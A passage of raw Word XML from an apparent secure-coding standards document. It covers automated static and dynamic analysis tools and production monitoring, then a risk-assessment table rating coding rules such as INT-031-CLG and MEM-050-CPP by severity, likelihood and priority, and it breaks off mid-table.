      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidRPr="54BB6B49">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="40" w:name="_Int_9JdvPd4a"/>
      <w:r w:rsidRPr="54BB6B49">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Provide the tool name, version, checker, and description. List one or more tools that can automatically detect this issue and its version number, name of the rule or check (preferably with link), and any relevant comments or description—if any.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidRPr="54BB6B49">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">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41" w:name="_Toc52464074"/>
      <w:r>
        <w:t>Automation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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bookmarkStart w:id="42" w:name="_Int_VRN6KkAs"/>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bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="07184003" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00381847">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E783C16" w14:textId="60687B2F" w:rsidR="00381847" w:rsidRDefault="001C4832" w:rsidP="00004BFC">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>In the pre</w:t>
      </w:r>
      <w:r w:rsidR="00E3620D">
        <w:t>-production part of the process</w:t>
      </w:r>
      <w:r w:rsidR="00A64C86">
        <w:t xml:space="preserve"> security needs to be addressed in all aspects of planning, design, and building. </w:t>
      </w:r>
      <w:r w:rsidR="009523F3">
        <w:t xml:space="preserve">However, automation in the verify and test phase will ensure that </w:t>
      </w:r>
      <w:r w:rsidR="00CF22F7">
        <w:t xml:space="preserve">the standards </w:t>
      </w:r>
      <w:r w:rsidR="008509CE">
        <w:t xml:space="preserve">are being used and enforced. Using automation </w:t>
      </w:r>
      <w:r w:rsidR="00004BFC">
        <w:t xml:space="preserve">with tools </w:t>
      </w:r>
      <w:r w:rsidR="008509CE">
        <w:t xml:space="preserve">such as </w:t>
      </w:r>
      <w:hyperlink r:id="rId156" w:history="1">
        <w:r w:rsidR="008509CE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0052CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>Astrée</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00656C03">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="172B4D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId157" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00AA0A37">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0052CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>Parasoft</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00AA0A37">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0052CC"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t xml:space="preserve"> C/C++test</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005C2DF1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="172B4D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00004BFC">
        <w:t xml:space="preserve">allows for </w:t>
      </w:r>
      <w:r w:rsidR="00B80635">
        <w:t xml:space="preserve">statics analysis and dynamic testing of the </w:t>
      </w:r>
      <w:r w:rsidR="00691F92">
        <w:t>code to ensure vulnerabilities are limited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012D11C2" w14:textId="77777777" w:rsidR="00691F92" w:rsidRDefault="00691F92" w:rsidP="00004BFC">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E34E4B0" w14:textId="432B3E87" w:rsidR="00691F92" w:rsidRDefault="0016798A" w:rsidP="00004BFC">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidR="00F02DE4">
        <w:t xml:space="preserve">the production environment, we need to shift focus from the code itself to what </w:t>
      </w:r>
      <w:r w:rsidR="00954CDC">
        <w:t xml:space="preserve">users are doing with it. In the monitor and detect </w:t>
      </w:r>
      <w:r w:rsidR="00B954D9">
        <w:t xml:space="preserve">phase we can include automation for logging, </w:t>
      </w:r>
      <w:r w:rsidR="008F4DBA">
        <w:t xml:space="preserve">intrusion detection and </w:t>
      </w:r>
      <w:r w:rsidR="008322E6">
        <w:t>prevention systems</w:t>
      </w:r>
      <w:r w:rsidR="00E50B46">
        <w:t xml:space="preserve">, firewalls, </w:t>
      </w:r>
      <w:r w:rsidR="00C376F1">
        <w:t xml:space="preserve">and other tools to keep bad actors at bay and create a trail to follow if they do </w:t>
      </w:r>
      <w:r w:rsidR="00062614">
        <w:t>get into something sensitive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE74D2E" w14:textId="77777777" w:rsidR="00004BFC" w:rsidRDefault="00004BFC">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05A5EC24" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9" w:rsidP="0059536C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc52464075"/>
      <w:r>
        <w:t>Summary of Risk Assessments</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4960D3E1" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Int_wSGE6OOu"/>
      <w:r>
        <w:t>Consolidate all risk assessments into one table including both coding and systems standards, ordered by standard number.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>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tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>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192176">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="3779210C" w14:textId="3FC66E47" w:rsidR="00381847" w:rsidRDefault="000E5F9A">
            <w:r>
              <w:t>EXP-009-C</w:t>
            </w:r>
            <w:r w:rsidR="001531A1">
              <w:t>LG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="3CF590EB" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="33C54CC1" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:r>
              <w:t>Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="331E6999" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="30C5D21F" w14:textId="58887139" w:rsidR="00381847" w:rsidRDefault="000E5F9A">
            <w:r>
              <w:t>P6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="301ACA4D" w14:textId="67DD146C" w:rsidR="00381847" w:rsidRDefault="000E5F9A">
            <w:r>
              <w:t>L2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="5E698A8A" w14:textId="77777777" w:rsidTr="00192176">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="A5A5A5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="A5A5A5"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="5221428A" w14:textId="14E18CA5" w:rsidR="00381847" w:rsidRDefault="0084585E">
            <w:r>
              <w:t>INT-031-C</w:t>
            </w:r>
            <w:r w:rsidR="001531A1">
              <w:t>LG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="61027C5A" w14:textId="6A0D7CFD" w:rsidR="00381847" w:rsidRDefault="0084585E">
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="376968D4" w14:textId="4934B4FD" w:rsidR="00381847" w:rsidRDefault="0084585E">
            <w:r>
              <w:t>Probable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="61E76894" w14:textId="51441C89" w:rsidR="00381847" w:rsidRDefault="00814DD9">
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="05A3CE43" w14:textId="7C4338BE" w:rsidR="00381847" w:rsidRDefault="00814DD9">
            <w:r>
              <w:t>P6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="782C814E" w14:textId="6609F9C1" w:rsidR="00381847" w:rsidRDefault="00814DD9">
            <w:r>
              <w:t>L2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="4E346B29" w14:textId="77777777" w:rsidTr="00192176">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="11F4BE0E" w14:textId="6516CB5E" w:rsidR="00381847" w:rsidRDefault="004B0981">
            <w:r>
              <w:t>STR-030-C</w:t>
            </w:r>
            <w:r w:rsidR="001531A1">
              <w:t>LG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="752BE477" w14:textId="3B02BE55" w:rsidR="00381847" w:rsidRDefault="004B0981">
            <w:r>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="2FE8B114" w14:textId="3D10E369" w:rsidR="00381847" w:rsidRDefault="004B0981">
            <w:r>
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="0CDE0BE2" w14:textId="23B53329" w:rsidR="00381847" w:rsidRDefault="00081B46">
            <w:r>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="3D7A98BF" w14:textId="03AC5E6A" w:rsidR="00381847" w:rsidRDefault="00081B46">
            <w:r>
              <w:t>P9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="2342A158" w14:textId="33A7D909" w:rsidR="00381847" w:rsidRDefault="00081B46">
            <w:r>
              <w:t>L2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="334DB08B" w14:textId="77777777" w:rsidTr="00192176">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="A5A5A5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="A5A5A5"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="4BFFD498" w14:textId="2B2E4678" w:rsidR="00381847" w:rsidRDefault="00175150">
            <w:r>
              <w:t>STR-002-</w:t>
            </w:r>
            <w:r w:rsidR="00B71DD3">
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidR="001531A1">
              <w:t>LG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="308B96BF" w14:textId="1697C854" w:rsidR="00B71DD3" w:rsidRDefault="00B71DD3">
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="7622FAD2" w14:textId="623C371B" w:rsidR="00381847" w:rsidRDefault="00B71DD3">
            <w:r>
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="36FD3789" w14:textId="73B266AB" w:rsidR="00381847" w:rsidRDefault="00B71DD3">
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="2B485651" w14:textId="374360AC" w:rsidR="00381847" w:rsidRDefault="00B71DD3">
            <w:r>
              <w:t>P18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="11242936" w14:textId="595A9D95" w:rsidR="00381847" w:rsidRDefault="00B71DD3">
            <w:r>
              <w:t>L1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="2F0514EA" w14:textId="77777777" w:rsidTr="00192176">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="467A999D" w14:textId="7217090C" w:rsidR="00381847" w:rsidRDefault="005728BD">
            <w:r>
              <w:t>MEM-050-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="6864030F" w14:textId="1593A713" w:rsidR="00381847" w:rsidRDefault="005728BD">
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="5FD64D49" w14:textId="3FF69814" w:rsidR="00381847" w:rsidRDefault="005728BD">
            <w:r>
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="3B5FC682" w14:textId="242EBE69" w:rsidR="00381847" w:rsidRDefault="005728BD">
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="644F2CA9" w14:textId="6E898B62" w:rsidR="00381847" w:rsidRDefault="005728BD">
            <w:r>
              <w:t>P18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="4C713B84" w14:textId="5AAFF530" w:rsidR="00381847" w:rsidRDefault="005728BD">
            <w:r>
              <w:t>L1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="4E676554" w14:textId="77777777" w:rsidTr="00192176">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="A5A5A5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="A5A5A5"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="7100264D" w14:textId="52D257EE" w:rsidR="00381847" w:rsidRDefault="00BE550A">
            <w:r>
              <w:t>PRE-031-C</w:t>
            </w:r>
            <w:r w:rsidR="001531A1">
              <w:t>LG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="2DCA5B40" w14:textId="5B498C26" w:rsidR="00381847" w:rsidRDefault="00BE550A">
            <w:r>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="471B62B8" w14:textId="144433BE" w:rsidR="00381847" w:rsidRDefault="00BE550A">
            <w:r>
              <w:t>Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="00A6F6BA" w14:textId="29BD7A6D" w:rsidR="00381847" w:rsidRDefault="00BE550A">
            <w:r>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="2053F4CB" w14:textId="3378B300" w:rsidR="00381847" w:rsidRDefault="00BE550A">
            <w:r>
              <w:t>P3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="4FE2E491" w14:textId="63D0377B" w:rsidR="00381847" w:rsidRDefault="00BE550A">
            <w:r>
              <w:t>L3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="2909CEA7" w14:textId="77777777" w:rsidTr="00192176">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="6FA73728" w14:textId="62A21C08" w:rsidR="00381847" w:rsidRDefault="00C85C61">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>ERR-</w:t>
            </w:r>
            <w:r w:rsidR="00FF11AD">
              <w:t>051-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="7CFBEC18" w14:textId="3F8CAB36" w:rsidR="00381847" w:rsidRDefault="00FF11AD">
            <w:r>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="679D4A94" w14:textId="322653F2" w:rsidR="00381847" w:rsidRDefault="00FF11AD">
            <w:r>
              <w:t>Probable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="18430555" w14:textId="14B9E695" w:rsidR="00381847" w:rsidRDefault="00FF11AD">
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="5E304121" w14:textId="126BB4CE" w:rsidR="00381847" w:rsidRDefault="00FF11AD">
            <w:r>
              <w:t>P4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="7C3F721D" w14:textId="44A13BE3" w:rsidR="00381847" w:rsidRDefault="00FF11AD">
            <w:r>
              <w:t>L3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="007D0FBC" w14:textId="77777777" w:rsidTr="00192176">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="A5A5A5"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="A5A5A5"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="7849A9EA" w14:textId="27E1AD08" w:rsidR="00381847" w:rsidRDefault="00FE6383">
            <w:r>
              <w:t>DCL-</w:t>
            </w:r>
            <w:r w:rsidR="006E568A">
              <w:t>058-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="3D0880A0" w14:textId="638829AC" w:rsidR="00381847" w:rsidRDefault="006E568A">
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="0A3B5577" w14:textId="512B4692" w:rsidR="00381847" w:rsidRDefault="006E568A">
            <w:r>
              <w:t>Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="214A79D1" w14:textId="0F1BA1DA" w:rsidR="00381847" w:rsidRDefault="006E568A">
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="41301A9F" w14:textId="086F3C5A" w:rsidR="00381847" w:rsidRDefault="006E568A">
            <w:r>
              <w:t>P6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2680" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="6D7A1B7A" w14:textId="5D02D7DC" w:rsidR="00381847" w:rsidRDefault="006E568A">
            <w:r>
              <w:t>L2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="30EB0D27" w14:textId="77777777" w:rsidTr="00192176">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1430" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="58D14EE0" w14:textId="7A58AA13" w:rsidR="00381847" w:rsidRDefault="00350538">
            <w:r>
              <w:t>EXP-053-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="70CBCE53" w14:textId="3E15A682" w:rsidR="00381847" w:rsidRDefault="00350538">
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="55B7417C" w14:textId="0307F472" w:rsidR="00381847" w:rsidRDefault="00350538">
            <w:r>
              <w:t>Probable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
          </w:tcPr>
          <w:p w14:paraId="72580B49" w14:textId="21CC2D19" w:rsidR="00381847" w:rsidRDefault="00350538">
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
